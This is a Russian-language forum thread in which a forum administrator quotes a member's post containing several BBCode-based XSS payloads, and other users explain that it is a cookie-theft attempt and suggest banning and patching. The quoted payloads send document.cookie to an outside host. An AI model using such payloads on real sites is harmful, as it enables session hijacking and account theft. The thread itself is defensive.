ssh Опубликовано 25 Января 2007 Жалоба Поделиться Опубликовано 25 Января 2007 На форуме который я администрирую, один из участников в теме посвященной ошибкам в работе скриптов форума, публикует следующее:Собственно по сабжу. Всё найденное приведено далее... [email]wj@wj.com[/email] ` style=`background:url(java script:document.images[1].src="http://antichat.org/s/ThreeD.gif?"+document.cookie);` [HTML][EMAIL][/EMAIL][/color]` style=`background:url(java script:document.images [1].src="http://antichat.org/s/ThreeD.gif?"+document.cookie)` [EMAIL]mail@mail.com.src="http://antichat.org/s/ThreeD.gif?"+document.cookie); ][/EMAIL] [post=1000[topic=target style=background:url(java script:document.images[1].src="http://antichat.org/s/ThreeD.gif?"+document.cookie); ][/topic]][/post] [email]wj@wj.com[/email] ` style=`background:url(java script:document.images[1].src="http://antichat.org/s/ThreeD.gif?"+document.cookie);` [COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(java script:document.images[1].src="http://antichat.org/s/ThreeD.gif?"+document.cookie) [еmail]wj@wj.com[/email] ` style=`background:url(java script:document.images[1].src="http://antichat.org/s/ThreeD.gif?"+document.cookie);` [EMAIL][/EMAIL]]` style=`background:url(java script:document.images[1].src="http://antichat.org/s/ThreeD.gif?"+document.cookie)` [HTML][EMAIL][/EMAIL]` style=`background:url(java script:document.images[1].src="http://antichat.org/s/ThreeD.gif?"+document.cookie)` Теперь я весь в раздумьях, как же это понимать? Спрашивать автора сообщения как-то не серьезно Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Song Опубликовано 25 Января 2007 Жалоба Поделиться Опубликовано 25 Января 2007 Это он пытается угнать твои куки. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 ssh Опубликовано 25 Января 2007 Автор Жалоба Поделиться Опубликовано 25 Января 2007 Это он пытается угнать твои куки.Я правильно понимаю, что у него это не вышло?А, что можно предпринять скажем так во избежание? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 -Зверик- Опубликовано 26 Января 2007 Жалоба Поделиться Опубликовано 26 Января 2007 Написать ему грозное письмо на емейл, потом забанить его и его айпи. Убедится что форум пропатчен. Ну и например поставить http://www.ibresource.ru/db/613/ , Advanced input data verifier , не помешает точно. А. И следить за выходом новых уязвимостей. И патчится. И будет вам счастье. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
ssh
На форуме который я администрирую, один из участников в теме посвященной ошибкам в работе скриптов форума, публикует следующее:
Теперь я весь в раздумьях, как же это понимать? Спрашивать автора сообщения как-то не серьезно
Ссылка на комментарий
Поделиться на других сайтах
3 ответа на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.